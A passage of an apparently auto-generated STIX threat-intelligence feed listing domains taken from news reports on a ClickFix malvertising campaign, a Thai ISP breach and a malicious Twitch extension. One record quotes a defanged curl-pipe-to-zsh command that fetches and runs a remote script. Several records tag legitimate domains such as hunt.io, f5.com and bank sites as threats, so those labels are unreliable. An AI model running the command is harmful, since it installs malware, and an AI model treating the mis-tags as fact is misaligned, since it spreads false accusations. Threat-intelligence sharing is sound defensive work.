counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the site","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d370ba9a-39bd-4eaf-909c-1e7802c5d26c","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: fied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. A","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fbe1b4e-e4d5-4711-822e-24a4cee22efb","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: focused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performe","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd3ab7e5-39b8-4a11-81a1-0ab19b60b724","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: 10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a comp","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90b2c1e3-810e-4da7-9cb5-59408fa9a7c0","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: ernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested t","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--515e7f9a-58f2-4249-b837-1a8df4758470","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: abchina.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: .]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit","pattern":"[domain-name:value = 'abchina.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c1d7634c-a680-4623-a512-1dad81e78c61","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ccb.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: k of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unio","pattern":"[domain-name:value = 'ccb.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60101755-619a-4997-96c5-1a99054098d0","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: com.cn","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Note: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultu","pattern":"[domain-name:value = 'com.cn']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc1d8b00-3940-41eb-92ee-f4bc50e153af","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lzbank.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abc","pattern":"[domain-name:value = 'lzbank.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd32932f-8e1b-41d7-a367-7c23a6b74137","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clean-disk-guide.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Of the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktop","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0314f52-4188-43bd-aaf1-2476e33e7f8b","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c007b69-a013-449c-a620-cbdf7c121dd5","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f7247a3c-b225-42cd-af4d-0c140182b8bf","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61fab84d-77c7-4a41-8098-7bd7ddc5e393","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ee74a51-0064-4a27-b3b1-4c96cc4b69ce","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--af08aed5-3993-4285-98e2-9fcd812370d3","created":"2026-09-14T19:03:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ttvnw.net","description":"Seen in \"Twitch extension with 30K installs exposes users’ OAuth tokens\" (BleepingComputer). Context: tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T19:03:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/twitch-extension-with-30k-installs-exposes-users-oauth-tokens/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b3cbbcc-0b19-4f9b-b39e-7a529ea8ef04","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ab9d608f-a6b7-46be-b2a6-ad180e7f6333","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: code-desktop.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c2fc3c0-beaf-4ff7-9e0a-2cb47fc930fa","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-craft.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8839abe8-a178-4f2d-8baf-36cae22b89de","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ember-bridge.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: lowing command: export _watch_v2=97d9d8dc;curl -sL \"https://ember-bridge[.]com/curl/a44a37519au/setup.sh\"| zsh Hudson Rock noted ember-b","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41329cec-016a-466f-9b46-258d2d76e546","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1262eb22-81e5-499d-8636-91129374077c","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.app","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e620b71-6365-4847-8f90-b19826edcfa5","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.us","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: Max subreddits,\" warned the user . \"The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6f1a9549-fd5f-4168-b9e9-b6b61dca6d9f","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: agent.3bb.co","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w","pattern":"[domain-name:value = 'agent.3bb.co']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6c65a55-f7b0-4ad6-bf2c-798cce972b00","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ayuthayatech.com","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8262cdb-4ef1-4aae-a14c-c03fe1438b41","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: co.th","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5cb9818a-bd9a-4237-badd-617e44f3b5bd","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hunt.io","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2470317a-957b-4473-ac51-b10839cbceab","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enro","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0885aac0-4eaf-4203-99ad-7bdc19cb3c4e","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0fe78279-cb14-49ff-8b58-304444ee06c9","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5ff6619-9db6-4e72-ae04-b6801d113e1f","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66bcdcfc-bf6a-4e2f-912e-1a865394f976","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: f5.com","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure","pattern":"[domain-name:value = 'f5.com']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ceb8aa18-a776-498b-a226-08050e7708ec","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: server.host","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--73293736-3359-48e7-85fb-330f4f9b551e","created":"2026-09-14T16:15:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: server.host","description":"Seen in \"Hackers target exposed Vite dev servers to steal AWS, Azure secrets\" (BleepingComputer). Context: pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:15:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-exposed-vite-dev-servers-to-steal-aws-azure-secrets/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c9c504c2-0e3f-4f66-aa2f-4be9203b0ff7","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: alexue4.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15","pattern":"[domain-name:value = 'alexue4.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f8c812d-198c-44a3-a29f-60f4d1e83171","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: api.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc","pattern":"[domain-name:value = 'api.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d352a044-001c-422e-b6a3-481ced08fe9d","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host","pattern":"[domain-name:value = 'drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 